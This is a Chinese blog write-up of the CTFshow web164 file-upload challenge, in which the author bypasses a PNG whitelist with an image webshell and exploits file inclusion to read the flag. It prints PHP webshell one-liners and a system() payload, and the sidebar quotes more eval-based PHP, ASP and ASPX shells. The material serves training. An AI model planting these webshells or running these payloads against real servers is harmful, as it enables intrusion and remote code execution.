CTFshow 文件上传 web164

已于 2022-02-16 21:07:53 修改
阅读量835 收藏
点赞数
分类专栏: CTFshow 文章标签: php
于 2022-02-16 21:07:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/122971503
版权

目录

思路

直接在burp里面改targethost的值,或者在本地发包
在这里插入图片描述
在这里插入图片描述
多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传

https://github.com/huntergregal/PNG-IDAT-Payload-Generator

虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单
在这里插入图片描述
.user.ini也无法正常上传,应该有其他的点可以利用.

直接在网站上上传图片马后,发现显示查看图片

在这里插入图片描述
点击查看图片后,跳转到/download.php?image=a976285aa6d6096e9edd17db289a73a9.png,图片也能正常显示,而且也不在upload目录,很明显当前目录存在文件包含

我们传入参数0和1,拼接成<?=system("tac f*");?>,但是页面没有回显,仍然是张图片

<?=$_GET[0]($_POST[1]);?>

下载查看图片,拿到flag

在这里插入图片描述

总结

Kradress
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFSHOW web164 PNG二次渲染脚本(生成图片马)
05-04
这段PHP代码创建了一个32x32的真彩色图片,并将一个数组中的RGB值作为像素颜色填充到图片上,最后将图片保存为名为"2.png"的文件。另外,这段代码还暗藏了一个木马内容,可以通过GET请求调用POST请求中的参数作为函数名执行任意代码。
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,包括数据库名、表名、列名和 flag 的值。在获取每个字符时,它会枚举 flag 可能的字符,逐个尝试,直到找到正确的字符为止。最终,它会输出获取到的完整 flag。要使用该脚本,只需要将 url 和 flag_str 变量修改为相应的值即可。
ctfshow web162-170_ctfshow162题,网络安全开发者值得深入思考的几个问题
m0_60635637的博客
04-05 571
这种情况,我们可以用条件竞争。png删除规则:1.后门删除。2.什么都删除。条件竞争:上传成功,立马访问,创建新代码在这里只删除了png,所以我们可以把代码放到.user.ini里。发现可以,直接用蚁剑连即可。
CTFshow--web入门--文件上传
qq_46874275的博客
04-24 1792
~目录~开始web151 改后缀 / 禁jsweb152 改后缀web153 .user.iniweb154、155 .user.ini + 短标签web156 {}web157、158、159 反引号执行命令web160 日志包含绕过web161 幻术文件头web162、163 session文件包含+条件竞争 开始 挑简单的先来 web151 改后缀 / 禁js 上传一个一句话,要求是图片格式,否则传不上去 <?php @eval($_POST['a']) ?> 然后抓包修改后缀为php
2024年全国职业技能大赛“网络安全赛项”国赛 模块B 任务解析(超详细)_2024年全国职业院校技能大赛高职组“网络空间安全(1)
最新发布
2401_84247559的博客
04-26 385
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验真理的唯一标准嘛~最后就是项目实战,这里带来的是。
CTFshow——web入门——文件上传
h_adam的博客
02-17 4955
web151 前端校验 修改上传格式为php,上传一句话马,蚁剑连接得flag web152 后端校验 上传一句话,png文件抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。 web153 打开发现/upload下存在index.php文件,我们可以利用.user.ini,可参阅.htaccess 和.user.ini 配置文件妙用 php手册—关于php.ini配置项 前端把后缀限制去掉,accept改为file,上传user.ini Content-Type修改为image/png
ctfshow-web入门 文件上传篇部分题解
volcano的博客
03-06 6486
ctfshow文件上传web151-152web153(.user.ini绕过).user.iniweb154-155(短标签绕过+.user.ini绕过)短标签绕过web156web157-159web160(日志包含绕过)web161web162-163(session文件包含+条件竞争)条件竞争web164(png图片二次渲染绕过)web165(jpg图片二次渲染绕过)web166web167(.htaccess) 文件上传 web151-152 这两题步骤是一样的,先写一个一句话: <?ph
CTFshow web入门——文件上传
小元砸的博客
03-14 9958
Web 151
【ctfshow】文件上传web151-170wp
weixin_51614272的博客
02-26 1594
文件上传web151-170web1511.编写一句话木马上传2.修改前端验证3.在蚁剑上找flagweb1521.修改前端验证2.burp抓包后修改MIME3.在蚁剑上找flagweb1531.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb154 web155 web156 web157 web1581.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb159日志包含漏洞web160 web151 1.编写一句话木马上传 发现前端有
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFShow文件上传
paidx0
08-07 413
CTFShow文件上传 web151 前端直接抓包改就行 web152 同上 web153 利用上传.user.ini进行文件上传绕过 php.ini是php的一个全局配置文件,对整个web服务起作用; 而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini, 通常用这个文件来构造后门和隐藏后门。 **利用.user.ini,要求目标目录下必须包含php文件** .user.ini的内容为auto_append_file=1.png,意思就是使1
Web】CTFSHOW 文件上传刷题记录(全)
uuzeray的博客
01-16 1662
期末考完终于可以好好学ctf了,先把这些该回顾的回顾完,直接rushjava!
ctfshow文件上传
njh18790816639的博客
04-23 844
web151(前端限制) 这里需要上传图片木马!所以我们需要先制作一张图片木马! php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request ("pass")%> aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 这里是比较常用的一句话木马! copy 1.png/b
ctfshow WEB入门 文件上传151-170
byname1的博客
01-07 1256
只是过滤了分号,其他同上。php的最后一个分号可以省略。
CTFshow 文件上传 web162
Kradress的博客
02-15 2025
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
ctfshow web入门文件上传
09-29
文件上传是CTF比赛中的一个常见挑战之一。其中一种方法是通过上传包含恶意代码的文件来绕过服务器的文件类型限制。比如,在上传图片时,可以同时上传一个名为.user.ini的文件,并在其中设置auto_append_file参数来包含木马文件。这样,每个PHP文件都会包含我们上传的恶意代码。 另一种方法是通过修改上传文件的Content-Type来绕过服务器对文件类型的过滤。比如,可以先上传一个zip文件,然后通过抓包工具修改请求的Content-Type为image/png,并将文件内容过滤的敏感字符替换掉,这样就能成功上传php等格式的文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值